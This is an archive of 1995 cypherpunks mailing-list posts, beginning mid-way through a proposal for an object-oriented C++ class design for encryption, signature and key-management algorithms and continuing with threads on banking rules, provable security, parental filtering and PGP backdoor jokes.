encryption key. Therefore, they can all be treated as-a member of a class
of EncryptionAlgorithm objects which implement a function called
encrypt(), which takes some plaintext, an encryption key, and outputs
some ciphertext. Nothing magical here, simple object-orientation.

A hypothetical abstract base EncryptionAlgorithm class might look like:

class EncryptionAlgorithm
{
public:
  virtual encrypt(EncryptionKey& key, PlainText& p, CipherText& c) = 0;
  virtual EncryptionKey generate_key(RandomNumberGenerator& rng) = 0;
};


And a possible concrete class:

class DESEncryptAlgorithm : public EncryptionAlgorithm
{
  typedef DESEncryptionKey keytype;
public:
  encrypt(DESEncryptionKey& key, PlainText& p, CipherText& c);
  keytype generate_key(RandomNumberGenerator& rng);
};


So to encrypt something with DES, you'd instantiate a DESEncryptionAlgorithm,
say labeled des, generate a key by asking the class to generate one, and
then call

Encrypt(des, deskey, plaintext, ciphertext);

But that 'des' could have just as well been a RSAEncryptionAlgorithm class,
in which case, the plaintext would have been encrypted with an rsa
public key (independent of whether DES or IDEA is being used as the
underlying BlockCipher)

Our design methodology throughout this article will be to look for common
behavior between algorithms and where it is found, define an abstract
base class around that behavior. Any specialization will be handled by
subclassing.

The case for Decrypt() looks almost identical, in fact, we could
overload Encrypt(), and call them both Crypt() and have assymetrical
ciphers work like symmetric ciphers. (the compiler would detect
a DecryptionAlgorithm instead of EncryptionAlgorithm and do the
neccessary magic) I feel this is a bad design decision because
it is confusing and removes some type safety. The processes of
encryption and decryption are semantically different, therefore
they deserve separate interfaces.

Now that you've see an example, let's proceed with the design.

SignatureAlgorithm
------------------
Signature systems typically sign "Message Digests", so intuition should
lead us to assume that we must have a "MessageDigest" object which
a SignatureAlgorithm may sign. "Message Digests" are generally produced
by one-way secure hash algorithms, so we also need a SecureHashAlgorithm
object that computes a MessageDigest given a PlainText. A MessageDigest
should be convertable to a BitString for signing. Finally, a signature
should be abstracted into a Signature class which has an equality
condition. With those thoughts, here's a proposed class.


class SignatureAlgorithm
{
private:
  SecureHashAlgorithm& hashref;
public:
  SignatureAlgorithm(SecureHashAlgorithm& h);
  virtual Signature sign(PublicKey, PlainText, CipherText) = 0;
};

class Signature
{
public:
  virtual operator==(Signature& s) = 0;
  // functions to cast to/from bitstring
};

Concrete example:

class RSASignature : public Signature { };

class RSASignatureAlgorithm: public SignatureAlgorithm,
			     private RSADecryptionAlgorithm
	                    (privately inherited because
                             the relationship is "implemented-in-terms-of")
{
  typedef RSADecryptionAlgorithm::keytype keytype;
  typedef RSASignature sigtype;	
  RSASignatureAlgorithm(SecureHashAlgorithm& h) :
	SignatureAlgorithm(h) {  }
  sigtype sign(keytype& privatekey, Plaintext& p, CipherText& c)
	{
	    decrypt(privatekey, hashref.digest(p), c);
	    return sigtype(c); /* signature constructed from signed
                                  message digest bitstring */
	}
};

Notice how the message digest (hash) algorithm is a polymorphic type. When
the object is constructed, it can be told to use any hash algorithm
independent of hash size, etc.

Verification works similarly. A concrete example

class RSAVerifierAlgorithm: public SignatureAlgorithm,
	                    private RSAEncryptionAlgorithm
{
  verify(keytype& publickey, Plaintext& p, Signature& s)
	{
            CipherText c;
	    encrypt(publickey, p, c);
	    return sigtype(c) == s;
	}
}

Key Retrieval
-------------
I will assume for sake of simplicity that all keys have a KeyId associated
with them, perhaps just the name of the person who owns the key. A KeyID
is much like an ISBN number for a book. Whether you're in the Library
of Congress, B Dalton Bookstore, or searching an electronic catalog,
you can still find the book. What's common about the different mediums
where the book is located is that 1) it's still a book, and 2) it has an
ISBN. So, our model will be to generalize the places keys are found into
things called KeyDomain, and to generalize the ID of a key into something
called a KeyID. The function of a KeyDomain is to be able to retrieve/store
a Key based on a KeyID. A KeyDomain might be just a KeyRing on your
filesystem, or it may be a KeyServer. The key idea ( ;-) ) here is that
it doesn't matter.

Problems however start to arise when a single KeyDomain can store keys
for multiple algorithm types. For instance, a KeyServer storing keys
for both DSA and RSA. I don't know if this is a bad idea or not, but
since people will probably want to do it, it's probably a good idea to
support it.  One possibility is to have the KeyDomain return a generic
Key pointer, and use RTTI (run time type identification) to cast the
pointer to the appropriate type. I think this is a bad paradigm which
will lead to lots of programming errors and most C++ compilers don't
support RTTI yet. Therefore, my idea is to have a KeyDomain for each
cryptosystem which returns only keys of the type that cryptosystem
uses. The KeyDomain itself may be a KeyServer that connects to some
internet based server which stores lots of different key types, but
the idea is that the KeyServer filters out key requests which do not
conform to the type required. If you ask an RSAKeyServer for a KeyID
that corresponds to a DSA key, it will fail to find it even though the
physical server may actually store it.

The same comments go for a KeyRing which stores multiple types. A typical
object hierarchy may look like this:

                                 KeyDomain
                               (Returns Key)
                                /          \
                         RSAKeyDomain       DSAKeyDomain
                        (Returns RSAKey)    (Returns DSAKey)
                            /    \                /         \
                     RSAKeyRing  RSAKeyServer  DSAKeyRing    DSAKeyServer

(The *KeyRing and *KeyServer above also multiply inherit from KeyRing and
KeyServer represpectively. This is to encapsulate network and file i/o
abstractions) My first shot at the base class is

class KeyDomain
{
  typedef Key keytype;
  virtual keytype fetch(KeyId) = 0;
  virtual keytype put(KeyId) = 0;
};

class RSAKeyDomain
{
  typedef RSAKey keytype;
  virtual keytype fetch(KeyId) = 0;
  virtual keytype put(KeyId) = 0;
};

KeyRing and KeyServer are important because they will encapsulate
the i/o functions neccessary and store information (like the hostname
and port of a keyserver), but I can not define them right now without
more research into existing formats and protocols. Just picture
in your head, the KeyRing and KeyServer objects containing a nebulous
cloud which does the appropriate magic.

class KeyRing
{
  magic_io_function(magic_arg); // implements file system fetches
}

class RSAKeyRing : public RSAKeyDomain, public KeyRing
{
  // example fetch
  keytype fetch(KeyId) { return magic_io_function(magic_manipulate(KeyId)); }
};

Key Generation
--------------
  Key generation is dependent on two things. The cryptographic algorithm
being used and the random number generator used. The problem with the
examples given earlier is that the generation of encryption and decryption
keys can normally not be done separately. An encryption and decryption
key are intimately related by virtue of the fact that they are semantic
inverses. Therefore, what really should be generated is not individual
keys, but key pairs. Furthermore, since the encryptor usually generates
the keys, I'm placing the KeyPair generating function on the
EncryptionAlgorithm. An alternative architecture is to define another
object hierarchy called "KeyGenerator" and subclass "RSAKeyGenerator",
"DESKeyGenerator", etc. In the case of symmetric algorithms, such as a
DESKeyPair, the object would only store the secret key, but the
"get" functions on the object would return the same key whether you are
asking for the encryption key or the decryption key.

Imagine the following

BlumBlumShubGenerator bbsg(KeyStrokeBitSource());
DESAlgorithm des;
DESKeyPair dpair = des.generate_key(bbsg);

des.encrypt(dpair.encryptionkey(), plaintext, ciphertext);

DESKeyPair might look like this

class DESKeyPair : public KeyPair
{
private:
  private_storage_type x;
public:
 // both functions return the same key 'x'
  DESEncryptionKey encryptionkey() { return DESEncryptionKey(x); }
  DESDecryptionKey decryptionkey() { return DEDDecryptionKey(x); }
}

Division of Labor
-----------------
  By defining a standard set of abstract interfaces, reuseable software
components are possible. This means that cypherpunks can write code
at the micro-level,  optimize it, implement the newest algorithms,
and distribute the result, which can then automagically be included
in software applications by simply relinking. (and with a Java
implementation, it really is automagic ;-)) Also, since only
those objects which are used are linked in, executable size can be
kept small. By using abstract base classes, and isolating implementation
from interface, recompiles can be kept to a minimum.


Low Level Hierarchy
-------------------
  Since public key algorithms often need BlockCiphers to accomplish
encryption, several further abstractions are needed.


BlockCipherEncrypt (child of EncryptionAlgorithm)
     encrypt(key, plaintext, ciphertext)
     generate_key(randomnumbergenerator)
BlockCipherDecrypt (child of DecryptionAlgorithm)
     decrypt(key, plaintext, ciphertext)

These are generic classes that specify an interface for symmetric
block ciphers.


example (refined from earlier):
class DESEncryptionAlgorithm: public BlockCipherEncrypt
{
	typedef DESKey keytype;
	encrypt(key, plaintext, ciphertext);
	keytype generate_key(RandomNumberGenerator);
}


A public key algorithm is a special case of an algorithm, so

class PublicKeyEncryptionAlgorithm : public EncryptionAlgorithm
{
private:
   BlockCipherEncrypt& bc_enc;
public:
    	PublicKeyEncryptionAlgorithm(BlockCipher& bc);
	encrypt(PublicKey, PlainText, CipherText);
        raw_encrypt(PublicKey, PlainText, Ciphertext); // used for signing
                                                       // digests
}

All public key algorithms are constructed with a BlockCipher so that
the encrypt function knows which cipher to use (unless of course
you are only using raw_encrypt(). Using normal encrypt() without
initializing with a BlockCipher should throw an exception). The
PublicKeyDecryptionAlgorithm class is defined similarly with
BlockCipherDecrypt;

Given these classes, here's what how an RSA concrete class might look.

class RSAimplement; // implements low-level rsa operation
                    // after all, encryption and decryption are just
                    // modular exponentiation. Let's call this
                    // rsa_op(factor, exponent, modulus)

class RSAEncryptionAlgorithm : public PublicKeyEncryptionAlgorithm,
                               private RSAimplement
{
	RSAEncryptionAlgorithm(BlockCipherEncrypt& foo) : bc_enc(foo) {}
	encrypt(RSAPublicKey& r, PlainText& p, CipherText& c)
	{
	   BlumBlumShubGenerator bbs(KeyBoardRandomBitSource());
	   BlockCipherKey session_key=bc_enc.generate_key(bbs);
	   bc_enc.encrypt(session_key, p, c);
	   rsa_op(session_key, r.exponent(), r.modulus());
	}
}

Typical usage pattern might be as follows:


DESAlgorithm des;
RSAAlgorithm rsa(des);
KeyID kid("deepthroat");
RSAKeyServer rsaks("blacknet.net", PORT_BLACK);
PlainText p; // pictures of Senator Exon being spanked by his Mistress
CipherText c;
RSAKey pkey;
RFC822Encoding email;

pkey=rsaks.fetch(kid)
Encrypt(rsa, pkey, p, c);
email.encode(c);

cout << email;

Auxillary class hierarchies
---------------------------
  Many of the above classes depend on polymorphic lower-level classes
to implement hash algorithms, key generation, random number generation,
number theory, primality testing, output encoding, and so on. The
following are just a few example hierarchies. (class interfaces will be
defined later)


These classes form the hash of a Plaintext and return MessageDigest
SecureHashAlgorithm---------------------------------------------------
         |                   |                    |                  |
    MD5Algorithm      NISTSecureHash            Haval              Snefru


These classes return a random bitstring of a specified number of bits
RandomNumberGenerator-------------------------------------------------
         |                   |                    |                  |
 BlumBlumShubGenerator   HashGenerator        UnixRand      RadioactiveHardWare


These classes test an Integer for the specified typed of primality and
optionally suggest an increment value (to find the next such prime)
ProbablePrimeTest-----------------------------------------------------
         |                   |                    |                  |
    FermatTest          MillerRabin            StrongPrime        BlumPrime

(e.g. a RandomPrime routine might take a RandomNumberGenerator and a
       ProbablePrimeTest as arguments. It uses the RNG to get a starting
       point, sieves a number, and if it passes the test, lets the
       PPT object test it for the right qualities. )

Comments
--------
  Some of you may be asking "what's the point? Some libraries like Crypto++
can already compute all these things." The point of this exercise is to
devise an object hierarchy, interface, and dependency between these
algorithms so that they can interoperate without the user having to know
how they interoperate (or perform conversions himself between the different
formats each algorithm expects) Algorithms share common data formats and
interfaces.

  One crucial design feature of this hierarchy is that the graphs contain
no cycles. This alleviates the need to worry about virtual base classes
in multiple inheritance or object overlap.

Criticism
---------
  * overuse of subclassing might be slow
    answer: the performance impact of a virtual function call is minimal
            in comparison to performing a modular exponention

  * encapsulating raw data like digests into objects like MessageDigest
        when they are just going to be converted back to a raw bitstring
        is a waste of time and cpu
    answer: the cost is of setting a pointer to a databuffer and
            returning that pointer thru a class interface which can be
            inlined. the gain in abstraction which allows several different
            representations of digests, plus the type safety is worth the
            trade off. In the worst case, typedef MessageDigest to your
            favorite type.

  * C is more popular, we need a C library, not a C++ one
    answer: define a C interface library which hides the C++ and
            controls objects via takes. e.g.
            enum algorithms { RSA_ALGORITHM, DES_ALGORITHM, ... }
            encrypt(RSA_ALGORITHM, ....);
            the encrypt function would perform a case statement on
            these tags and allocate the appropriate C++ objects.
            We still gain abstraction and component behavior.

  * I think your class hierarchy sucks
    answer: then make some suggestions on how to improve it

  * object oriented programming is a fad, it doesn't gain you anything
    answer: it all depends on the design. Almost all new langages now a days
            are OO, and C++ is one of the fastest growing languages in the
            market. OO has proven advantages.

  * this is too much work
    answer: the bulk of the work is already done. Crypto++ has the
            actual implementation of most of these functions. All we
            need to do write the definitions of these classes with
            appropriate forwarding functions.

  * The NSA doesn't like "crypto hooks", this object oriented component
    system allows any algorithm to be "dropped in"
    answer: NSA who? Sorry, I don't recall.


Encoding
--------
  I purposely left this part out. It's the most complex piece of the design
but it is doable. The basic idea is to make all the objects "persistent"
in that they have a type id, and know how to translate themselves into
an internal stream based data format. Encoding objects would construct
streams out of keys, and algorithm outputs, and ciphertexts, and Integers,
etc. Later, StreamModules would take these streams and translate them into
the appropriate real world format (like PGP's CTB cyphertext block stuff)
Likewise, those same modules would constuct a protocol stream from
the real world format, and Decoding objects would turn those into objects.



Finally, a picture
------------------


EncryptionAlgorithm----
     |	               |
 PKeyEncAlgorithm      BlockCipherEncAlgorithm
   | 	     |	             | 	         |    	
  RSAEncAlg  ElGamalEncAlg   DESEncAlg   IDEAEncAlg
      |            |    	 |            |
      |            |             |            |
      |            |    	 |            |
 RSAAlgorithm  ElGamalAlg    DESAlgorithm  IDEAAlgorithm
      |            |             |            |
      |            |    	 |            |
      |            |    	 |            |
  RSADecAlg  ElGamalDecAlg   DESDecAlg   IDEAEncAlg
     |       |               |           |
 PKeyDecAlgorithm      BlockCipherDecAlgorithm
     |                 |
DecryptionAlgorithm----




-Ray Cromwell <rjc@clark.net>


















From owner-cypherpunks  Wed Aug  2 14:31:05 1995
Return-Path: <owner-cypherpunks>
Received: by toad.com id AA11854; Wed, 2 Aug 95 14:31:05 PDT



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 2 Aug 95 14:44:31 PDT
To: cypherpunks@toad.com
Subject: Re: US vs Overseas Banks
Message-ID: <v02120d1eac45b00dab31@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



>>
>> Of course, this bank has been criticized for being somewhat lax on who
>> they give accounts to, but the point still stands.  I could have been
>> anybody, and give any false address.  *shrug*
>
>Why should they give a damn who you are?  IMO, it's none of their
>business.  Hell, they're making $$$ on *your* deposits, it's time they
>stopped being such shits about it.

Mostly they are afraid that you will get checks under a fake name, and
bounce a lot of them, which ends up costing them a lot of money, even
though they don't pay off on them. (Most of the  costs of any financial
transaction system come from handling exceptions). They are also
under obligation to provide accurate SSN or Business Tax-ID information
to the government on any interest-bearing account, so that you are
forced to declare it on your income taxes.

Clearly there are other ways of preventing or insuring against the
problems that arise from check fraud (such as not issuing checks),
but the IRS requirements are out of the bank's hands.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 2 Aug 95 15:26:40 PDT
To: Kragen J Sittler <xentrac@unm.edu>
Subject: DETWEILLER
In-Reply-To: <Pine.A32.3.91.950802142803.44927A-100000@pegasus.unm.edu>
Message-ID: <Pine.SUN.3.91.950802144812.22631E-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 2 Aug 1995, Kragen J Sittler wrote:

> On Mon, 31 Jul 1995, SysAdmin wrote:
> 
> > ObCypherpunk: Anybody heard from Detweiller?

Actually, he was at the last Bay Area Cypherpunks physical 
meeting under another name.  At least he learned that Eric Hughes 
and I are not the same person.  Unfortunately, Tim May was not in
attendance so no telling what he thinks.  

In addition, he has been fairly active on list of late.  I think
you all know which poster is he.

Hell, I don't care, just as long as he isn't frothing.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Sheppard <Matthew.Sheppard@Comp.VUW.AC.NZ>
Date: Tue, 1 Aug 95 19:55:53 PDT
To: cypherpunks@toad.com
Subject: Provably Correct Crypto?
Message-ID: <199508020255.OAA10557@bats.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The shadowy figure took form and announced "I am Dr. Frederick B. Cohen and I s
ay ...
> > I don't accept the ability to compile it myself as evidence and I
> > don't accept a summary of that source written in english prose
> 
> The reason to believe that thttpd fulfills the claims it makes is
> provided in some detail in the white paper on our server (see what's new
> under http://XXX.XXX).  A slightly more detailed version has been
> submitted for a journal article, and hopefully will appear in a year or
> two.
> 
>    [ A ton of crap which was exactly what I said I didn't want ]

I stipulated I didn't want any such garbage, I specifically said
english summaries are not acceptable and you bombard me with them.
Yet you wont accept others opinion of PGP's security, which verbal or
other wise, can only be an abstract summary.

> > You state that crypto should be poved correct and suggest a technique
> > otherwise known as formal specification.  I agree, pgp should have
> > been written in Z-specs.  If you take a course in formal specification
> > you will soon see the intractability of the technique wrt large
> > systems.
> 
> I didn't say that.  Perhaps you should review what I said before
> characterizing it.

piffle! Your words:
	"I think that this issue can generally be addressed by a divide
	and conquer strategy.  Prove that the called routines are
	correct and confined under all possible parameters, do the
	same for the calling routines, do the same for the interaction
	between them, and I think you have it."

This sounds like performing a formal analsis to me.  And you didn't
address the intractability anyway.

> I have shown (not yet proven) certain things.  A graduate student is now
> working on trying to prove the various properties I believe to be of
> interest in an automatic theorum prover he is working on.

The work in automatic theorum proving is ongoing and not limited to
your grad student or your work.

> I believe that these things are worth showing (and proving), but you
> may certainly feel free to disagree with these contentions.

I said showing by english isn't good enough, proving would be
fantastic.  I don't believe these issues reside solely with pgp and as
such you should question computability as a whole before using
"incomplete specification" in accusing one system to be flawed.
 
> > If you want prople on this list to repeat after you "I cannot be
> > certain there is no compromising bugs or backdoors in X" Then I will
> > go out on a limb and say everyone here will agree if system X is
> > sufficiently large.
> 
> I don't believe I ever asked anyone on this list to repeat anything. 
> All I did was ask questions and respond to responses to my questions.

Your tiresome repetitive question was "Why do you belive X is secure"
I herby answer exactly as above "I cannot be certain there is no
compromising bugs or backdoors in X"

--
                                          <URL:http://www.comp.vuw.ac.nz/~matt>
         __________
       .- __   / -- -\  __   .  .  .           0
      / <___> ___  |  =8'                    //\/  
    .^| _---_ /   \ =   / \                 \/\
    |o |  =  / o | |   ||  |              ... /
    =0=======0==|  |----|  |=    Another drive by shooting on
     \_\_/    \_\_/   \_\_/         the information super highway.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 2 Aug 95 14:56:54 PDT
To: cypherpunks@toad.com
Subject: "The Net"
Message-ID: <ac45406918021004a6b0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I saw "The Net" yesterday and was moderately entertained. Lots of leaps of
logic, especially the notion that one can be "vanished" by having computer
records changed--I can believe that such changes would screw things up, but
surely even the character played by Sandra Bullock (nicely) would have
human friends and associates to vouch for her.

The portrayal of her job as a "beta tester," with a couple of Mac screens
running and lots of MacTCP connections, was well done. In fact, maybe the
most interesting look at computer screens I've seen. (But maybe I'm
biased...)

The cheesy climax, involving a computer virus, was especially egregious.
But tension has to be gotten somehow, I suppose, and most moviegoers will
not be terribly excited by the "real stuff." All in all, some good tension.

If this was the film I advised a woman screenwriter/researcher about (the
"vanishing" part she was asking me for tips on, 18 months ago), I sure
couldn't seen any influence of my ideas, or those of Cypherpunks. (I have
her name written down somewhere, but the two official screenwriters were
both male...still, I have a hunch she was doing background research for
them.)

Ironically, I saw a second movie the same day..."Under Siege II." It had a
lot of crypto, as well. Things like "Going secure" on cellphone
conversations with the Arabs purchasing the terrorist actions.


--The Praetorian
                                                           ----
                                                          | PI |
                                                           ----

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 2 Aug 95 23:33:55 PDT
To: hoz@univel.telescan.com
Subject: Re: Sat phone permit "wire"taps
In-Reply-To: <9507310754.AA17446@toad.com>
Message-ID: <eQ08myczByNO075yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9507310754.AA17446@toad.com>,
hoz@univel.telescan.com (rick hoselton) wrote:

[ Somebody else wrote ]

> >The most current information on the Rosenbergs, gotten from decrypted Soviet
> >communications and declassified US and ex-Soviet files, indicates that Ethel
> >Rosenberg
> >was probably innocent of spying, and Julius was spying but didn't give away
> >any useful atomic secrets, and that the FBI probably knew at the time they
> >had Ethel killed that she was innocent.  
> 
> WOW!  Had them killed?  They WERE tried and convicted, you know.  Are you 
> claiming evidence was manufactured?  I head David Khan on CSPAN say that 
> at least one message mentions Ethel Rosenberg.  If memory serves, he said 
> something like "without going in to whether evidence was sufficient to 
> convict, and without going in to whether they should have been executed, 
> these transcripts show that they were spying for the Soviets"  
> (I'm not sure that's accurate enough for quotation marks, but that's the 
> basics of what he said.  I have it on VCR.
> 
> Do you have additional information?  I'll agree the FBI hasn't always behaved 
> honorably, and maybe they aren't entitled to the benefit of the doubt here.

This is old news.  Julius spied, but didn't provide any useful
information. The FBI framed Ethel to try to get Julius to cop a plea
("Sing, or we fry her!")  Julius stuck to his principles, and both Ethel
and Julius were convicted in a rigged trial with a trained seal of J.
Edgar Hoover's as judge.

The Soviets had quality knowledge about the atomic bomb well before
Julius Rosenberg was in a position to pass any information along.  Klaus
Fuchs, the German refugee scientist who was a self-acknowledged
Communist from day one, was in on the most important atomic secret, that
a U235 bomb was practical, from the earliest days of the MAUD Committee,
the wartime British group of physicists that performed the first
calculations and that was the seed of talent around which the Americans'
Manhattan Project coalesced.


   Alan Bostick             | "Oh.  You come to Heaven without a fortune?"
Seeking opportunity to      | "Yes."
develop multimedia content. | "Unfortunate."
Finger abostick@netcom.com  |      Roger Zelazny, LORD OF LIGHT
for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQB1AgUBMCAM4eVevBgtmhnpAQHuNAL+OPVd24WG+Ev4KwwSAPc6h5VDrUlasHxt
hHLpz4Rjajt1Zbp8nSFM+jnemnjLKfbFCZZ6FLzXR4aXn/dM0z0C//wFanDD5+Dv
URGqxo+IJ+KTwiOqIAEx0+lVChaeDq8c
=2xoq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kragen J Sittler <xentrac@unm.edu>
Date: Wed, 2 Aug 95 16:36:18 PDT
To: Nathan Zook <nzook@bga.com>
Subject: Re: LD was Re: [NOISE] was Re: a hole in PGP
In-Reply-To: <Pine.3.89.9508021848.B3366-0100000@maria.bga.com>
Message-ID: <Pine.A32.3.91.950802163359.44927G-100000@pegasus.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Nathan Zook wrote:

> 
> 
> On Wed, 2 Aug 1995, Kragen J Sittler wrote:
> > doesn't recognize me, as his last (previous) words to me were 'just shut 
> > up, you writhing tentacle'.  Perhaps he's not so upset about things 
> > anymore; I don't know.
> 
> Kragen!  I haven't heard much from you since someone thought Kragen <-> 
> Kracken ==> monster ---> tentacle!  (And you were being pretty rational 
> at the time--for this list.)
> 
> Doing well, I hope.

*laugh* yes, relatively.  Moved to another state and started working at 
an underclass job.

And I'm trying frantically to unsubscribe; I no longer have big quotas 
and procmail.  My mail is going to cybele.unm.edu, which has since been 
renamed; also, I lost my account there.

You were the Christian fundamentalist, right?

Peace,
Kragen

Kragen Sittler <xentrac@unm.edu> 2.0 GCS/J/M/P/O/U/! d? H+/--- s+: !g>+ p?(?+)
!au a17.72 w+ v+(?(*)) C++(++++) UU/A/I/S+/->++ P+>+++ LX>++ 3>++ E(++)>+++     N++ K++>+++++ W--- M+/->+++ V(-) -po+ Y++>+++ !5 j R(-) G''' tv b+>+++ !D          e(*) u** h-/--/! f/+/++ r++ n+ y? (as of 9 Aug 1994) Blessed Be
     Atheism & Sex FAQs at http://www.unm.edu/~xentrac/News/faq/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 2 Aug 95 16:29:21 PDT
To: Kragen J Sittler <xentrac@unm.edu>
Subject: Re: LD was Re: [NOISE] was Re: a hole in PGP
In-Reply-To: <Pine.A32.3.91.950802142803.44927A-100000@pegasus.unm.edu>
Message-ID: <Pine.3.89.9508021848.B3366-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 2 Aug 1995, Kragen J Sittler wrote:

> On Mon, 31 Jul 1995, SysAdmin wrote:
> 
> > ObCypherpunk: Anybody heard from Detweiller?
> 
> Yes, I saw a posting from him (ldetweil@somewhere) on Usenet; I replied 
> and said it was good to see him back.  He answered politely; perhaps he 
> doesn't recognize me, as his last (previous) words to me were 'just shut 
> up, you writhing tentacle'.  Perhaps he's not so upset about things 
> anymore; I don't know.
> 
> Peace,
> Kragen
> 

Kragen!  I haven't heard much from you since someone thought Kragen <-> 
Kracken ==> monster ---> tentacle!  (And you were being pretty rational 
at the time--for this list.)

Doing well, I hope.

Nathan

P.S.: It's good to see this thread moving to the S side of the SNR





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 2 Aug 95 16:43:14 PDT
To: Patrick May <pjm@ionia.engr.sgi.com>
Subject: Re: NYET--attempted formal specs (again)
In-Reply-To: <199508021853.LAA10598@ionia.engr.sgi.com>
Message-ID: <Pine.3.89.9508021848.D3366-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 2 Aug 1995, Patrick May wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Nathan Zook writes:
> [ . . . ]
>  > NYET-- Non-Youths Exhibit Temperance.
>  >  
>  > This is a rising, legitamate concern among parents that their children
>  > have all-to-easy access to porn on the internet.  Last year, there
> [ . . . ]
>  >  
>  > But none of these proposals can ultimately succeed.  Here I restate my
>  > NYET proposal from last year for your consideration.  The system is of
>  > necessity ISP-based.  Home-based systems are subject to attacks at
>  > home.  Since many (most?) children are better with computers than
>  > their parents, these attacks can be expected to succeed.
> [ . . . ]
>  >
>  > The NYET-software runs as superuser on the ISP's machine.  All minor
>  > accounts have a corresponding configuration file sitting in their
>  > account owner's parent's directory, which is locked with read/write by
>  > owner only flags.  The correspondence between minor and parent
>  > accounts sits in a file owned by root and similiarly locked.
>  >  
>  > The parent sets the configuration file to permit and deny access to
>  > various parts of the net.  Since it is unreasonable for the parent to
> [ . . . ]
> 
>      Your solution fails against your specified threat.  Children who
> are more software-proficient than their parents will, in many cases,
> be able to access their parents' accounts and modify the configuration
> file (or simply use the account to access the blocked areas).
> Ultimately, all such systems are "home-based" if any accounts used by
> members of the household have or can be granted access to the naughty
> bits (tip o' the hat to M. Python).

Unquestionably, it is not possible to block this hole entirely.  However, 
that does not mean that this proposal is not still superior, at least on 
two points.

First, by moving the monitoring software to the ISP, the instalation & 
configuration becomes much easier and more secure for the parent.  The 
monitoring software itself becomes at least as difficult to hack as the 
rest of unix, and the "Hot Babes Watch" hacks at least are prevented.

Secondly, as we move to challenge-response systems, the ability of Jr. to 
forge parental access drops considerably.  The "Last access on" 
information could clue a parent in.  (Jr. could reset the clock before 
modifying programs at home.)


No one on this list is going to claim that a 17-year old who has been 
hacking since he was ten can be stopped.  That doesn't make these efforts 
doomed from the outset, however.  In particular, I want to avoid 
non-custom "solutions" for minors attempting access.


Nathan

>      While your proposal is obviously marketable, given the success of
> Prodigy and the prospects for SurfWatch, it does not appear to be
> inherently more secure than schemes that utilize subscriber software.
> 
> Regards,
> 
> Patrick May
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMB/Jqe5Yg08fDKehAQH16gQAp78uOJX02xNz7/5XYPBcaRZRC8pCWx6K
> oUdOxbGta/l1rKrRGWhJ7WLJy9iaopBcbr4YXNOMPL4Va91DEXkJ5rfJKXC+o7Mz
> jA0wBujVu0DK+S0C49Ah3OoXxX6H0SorbuscvDF2IIw9aGLSezD49H4/GgWvhklo
> Y1Gu5Tfok+Y=
> =FsYi
> -----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@tyrell.net>
Date: Wed, 2 Aug 95 17:34:58 PDT
To: bdavis@thepoint.net
Subject: a hole in PGP{n@3
In-Reply-To: <Pine.D-G.3.91.950802020333.25124A-100000@dg.thepoint.net>
Message-ID: <199508030021.AA04754@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Wed, 2 Aug 1995 02:09:25 -0400 (EDT)
   From: Brian Davis <bdavis@thepoint.net>

   You forgot the NSA's most recent overt act in the PGP conspiracy:  it 
   gets PGP declared a munition, harassing PZ, gets lots of bad press, etc., 
   all in order to make Cypherpunks believe that there is no back door, when 
   there really  is!

   Shhhhhhhhh. Don't let on that you know.  Just go back to Rot-13 encoding.

You forgot to mention that although PGP is "provably" secure, that the
NSA engine for breaking it is a quantum computer built with "borrowed"
extraterrestrial technology.

   > DCF


   EBD

P.S.: The Truth Is Out There.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Wed, 2 Aug 95 16:27:19 PDT
To: cypherpunks@toad.com
Subject: Cypherpunks Lobbying? (fwd)
Message-ID: <Pine.ULT.3.91.950802191734.8933A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


I posted this idea of mine about a month ago, when toad was having 
problems bouncing mail and the router on my own system was going crazy; I 
thought it had gone up but I got absolutely _no_ response about it, 
either pro or con, so I thought maybe I'd better repost it just in case 
it's still bouncing around sura or something.  I'll probably get flamed 
